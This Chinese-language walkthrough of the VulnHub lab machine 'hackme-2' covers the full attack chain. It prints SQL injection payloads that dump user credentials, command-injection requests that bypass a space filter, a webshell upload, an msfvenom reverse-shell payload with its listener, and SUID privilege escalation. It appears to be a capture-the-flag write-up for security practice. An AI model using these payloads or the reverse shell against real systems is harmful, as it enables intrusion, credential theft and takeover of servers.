下载地址: https://www.vulnhub.com/entry/hackme-2,330/测试机系统:kali、win10
测试机IP:192.168.3.140
kali:192.168.3.136
一、信息收集
1.主机发现
arp-scan -l
发现靶机IP:192.168.3.140
2.端口扫描
masscan --rate=100000 -p 0-65535 192.168.3.140
3.详细扫描
nmap -T4 -sV -O -p 22,80 192.168.3.140
4. gobuster进行目录扫描
gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.3。140 -t 30
5. 网站指纹识别
whatweb http://192.168.3.140
6.访问目录扫描出的网站
1. 进入主页发现是登录页面,没有用户名及密码,但是页面有注册链接,进行注册用户
admin : 111111
使用所注册的用户登陆成功
这里的搜索框可能存在sql注入漏洞, 尝试验证一下 : 输入 OSINT'
测试闭合方式 输入OSION'# 回显正常
使用order by 猜测字段 : OSINT’ order by 3# 这里没有正常回显
OSINT'order/**/by/**/1# #使用/**/过滤空格
OSINT'union/**/select/**/1,2,3# #使用union 联合查询查看回显
查询数据库名
OSINT'union/**/select/**/database(),2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()#
查询表名
OSINT'union/**/select/**/database(),2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users'#
OSINT'union/**/select/**/user,pasword,3/**/from/**/users#
找到superadmin用户 将加密值解码 得到密码: Uncrackable
登录进去
发现一个文件上传点 制作图片马上传 ,上传成功,但并未给出文件目录
下边还有一个命令执行漏洞注入点
两个查询框 可以尝试命令执行或是跨站脚本
2+2 被执行成了 4,这里可能存在 命令执行,万能phpinfo 打一下 ,回显phpinfo 存在 命令执行漏洞
使用bp 抓包 ,
fname=12&lname=system("cat<welcomeadmin.php")&search=Search+User
空格被过滤了,尝试使用<绕过空格
${IFS}也可以
通过阅读源码找到 文件上传的 路径访问我们刚刚上传的图片
上传成功,但并未解析成php
利用命令执行漏洞将图片改成php后缀
fname=12&lname=system('mv${IFS}/var/www/html/uploads/year2020/hack.jpg${IFS}/var/www/html/uploads/year2020/hack.php')&search=Search+User
使用蚁剑连接
成功getshell
访问/root的时候提示path not found or no permission 没有权限
权限提升
使用msf生成php木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.143 -f raw >/root/test.php
使用蚁剑上传到目标主机
msf开启监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.143
msf6 exploit(multi/handler) > run
访问我们的test.php页面
成功获取meterpreter
查找suid 文件
find / -perm -4000 -type f 2>/dev/null
/home/legacy/touchmenot 这个文件可疑 执行文件 查看当前用户,已经是root